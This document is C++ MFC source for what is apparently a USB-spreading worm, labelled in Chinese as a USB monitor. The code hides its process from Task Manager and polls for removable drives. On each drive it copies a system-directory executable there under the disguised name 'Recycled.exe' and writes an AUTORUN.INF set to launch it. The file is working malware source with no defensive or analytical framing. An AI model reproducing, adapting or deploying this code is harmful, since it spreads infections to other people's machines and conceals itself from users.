ucopy.cpp

监控u盘

// UCopy.cpp : Defines the class behaviors for the application.
//

#include "stdafx.h"
#include "UCopy.h"
#include "UCopyDlg.h"
#include "HideProcess.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CUCopyApp

BEGIN_MESSAGE_MAP(CUCopyApp, CWinApp)
	//{{AFX_MSG_MAP(CUCopyApp)
		// NOTE - the ClassWizard will add and remove mapping macros here.
		//    DO NOT EDIT what you see in these blocks of generated code!
	//}}AFX_MSG
	ON_COMMAND(ID_HELP, CWinApp::OnHelp)
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CUCopyApp construction

CUCopyApp::CUCopyApp()
{
	// TODO: add construction code here,
	// Place all significant initialization in InitInstance
}

/////////////////////////////////////////////////////////////////////////////
// The one and only CUCopyApp object

CUCopyApp theApp;
CHAR buf[512];
TCHAR   szMoveDiskName[33];
TCHAR	szDrvName[33];
/////////////////////////////////////////////////////////////////////////////
// CUCopyApp initialization
DWORD WINAPI UDiskScaner(LPVOID pvparam);
BOOL CUCopyApp::InitInstance()
{
	AfxEnableControlContainer();

	// Standard initialization
	// If you are not using these features and wish to reduce the size
	//  of your final executable, you should remove from the following
	//  the specific initialization routines you do not need.

#ifdef _AFXDLL
	Enable3dControls();			// Call this when using MFC in a shared DLL
#else
	Enable3dControlsStatic();	// Call this when linking to MFC statically
#endif

	if(OpenMutex(MUTEX_ALL_ACCESS,TRUE,"UCopy"))
	{
		return false;
	}
	CreateMutex(NULL,TRUE,"UCopy"); 

	//隐藏taskmgr
	HideProcess();

	HANDLE wthread=::CreateThread(NULL,0,UDiskScaner,(LPVOID)NULL,0,NULL);
	if(wthread==NULL)
	{
		return false;
	}

	CUCopyDlg dlg;
	m_pMainWnd = &dlg;
	int nResponse = dlg.DoModal();
	return FALSE;
}
BOOL GetDisksProperty(HANDLE hDevice, PSTORAGE_DEVICE_DESCRIPTOR pDevDesc)
{
	STORAGE_PROPERTY_QUERY	Query;	
	DWORD dwOutBytes;				
	BOOL bResult;					
	
	Query.PropertyId = StorageDeviceProperty;
	Query.QueryType = PropertyStandardQuery;
	
	bResult = ::DeviceIoControl(hDevice,			
		IOCTL_STORAGE_QUERY_PROPERTY,			
		&Query, sizeof(STORAGE_PROPERTY_QUERY),	
		pDevDesc, pDevDesc->Size,				
		&dwOutBytes,							
		(LPOVERLAPPED)NULL);					
	
	return bResult;
}

char chFirstDriveFromMask(ULONG unitmask)
{
	char i;
	for (i = 0; i < 26; ++i)  
	{
		if (unitmask & 0x1) 
			break;
		unitmask = unitmask >> 1;
	}
	
    return (i + 'A');
}

DWORD WINAPI UDiskScaner(LPVOID pvparam)
{
	DWORD dw = NULL;int k = 0;
	DWORD			MaxDriveSet, CurDriveSet;
	DWORD			drive, drivetype;
	TCHAR			szBuf[300];
	HANDLE			hDevice;
	PSTORAGE_DEVICE_DESCRIPTOR pDevDesc;
	char* p;		CString strDisk;

	while (1) {
		try {
			memset(szMoveDiskName,0,sizeof(szMoveDiskName));
			
			k = 1;		
			MaxDriveSet = CurDriveSet = 0;
			
			MaxDriveSet = GetLogicalDrives();
			CurDriveSet = MaxDriveSet;
			for ( drive = 0; drive < 32; ++drive )  
			{
				if ( MaxDriveSet & (1 << drive) )  
				{
					DWORD temp = 1<<drive;
					_stprintf( szDrvName, _T("%c:\\"), 'A'+drive );
					if(GetDriveType( szDrvName )== DRIVE_REMOVABLE)
					{
						drivetype = DRVREMOVE;
						
						//回避检测A、B 一般情况为软盘
						if (drive < 2) continue;
						sprintf(szBuf, "\\\\?\\%c:", 'A'+drive);
						hDevice = CreateFile(szBuf, GENERIC_READ,
							FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
						
						if (hDevice != INVALID_HANDLE_VALUE)
						{
							
							pDevDesc = (PSTORAGE_DEVICE_DESCRIPTOR)new BYTE[sizeof(STORAGE_DEVICE_DESCRIPTOR) + 512 - 1];
							
							pDevDesc->Size = sizeof(STORAGE_DEVICE_DESCRIPTOR) + 512 - 1;
							
							if(GetDisksProperty(hDevice, pDevDesc))
							{
								szMoveDiskName[k] = chFirstDriveFromMask(temp);
								szMoveDiskName[0]=k ++;
								p= (char*)pDevDesc;
							}
							
							delete pDevDesc;
							CloseHandle(hDevice);
						}
					}
				}
				
			}
			
			if(szMoveDiskName[0]!=0) {
				//找到U
				strDisk.Format("%s",&szMoveDiskName[1]);strDisk.Insert(1,":");
				WIN32_FIND_DATA  fdata;
				HANDLE           ffhandle;
				char		pPath[MAX_PATH];memset(pPath,0,MAX_PATH);
				char		pName[MAX_PATH];memset(pName,0,MAX_PATH);
				strcpy(pName,"\\windata.exe");
				CString		sztmp = strDisk;sztmp.Insert(sztmp.GetLength(),"\\Recycled.exe");
				GetSystemDirectory(pPath, MAX_PATH);
				ffhandle=FindFirstFile(sztmp,&fdata);
				if(ffhandle==INVALID_HANDLE_VALUE)
				{
					if(GetLastError()==2)  
					{
						//复制程序体
						//sztmp = strDisk;
						strcat(pPath,pName);
						CopyFile(pPath,sztmp,TRUE) ;
						//生成autorun.inf
						sztmp = strDisk;
						sztmp.Insert(sztmp.GetLength(),"\\AUTORUN.INF");
						
						FILE *pf = NULL;pf = fopen(sztmp,"wa");
						if (pf) {
							char buff[256];memset(buff,0,256);
							sprintf(buff,"[autorun]\nshellexecute=Recycled.exe\n");
							fwrite(buff,1,strlen(buff),pf);
							fclose(pf);
						}
					}
				}
				else FindClose(ffhandle);
			}
			else
			{
				//没有找到U
				Sleep(3000);
				continue;
			}
			
		}catch (...) {
			Sleep(3000);
			continue;
		}
		Sleep(3000);
	}
	
	return dw;	
}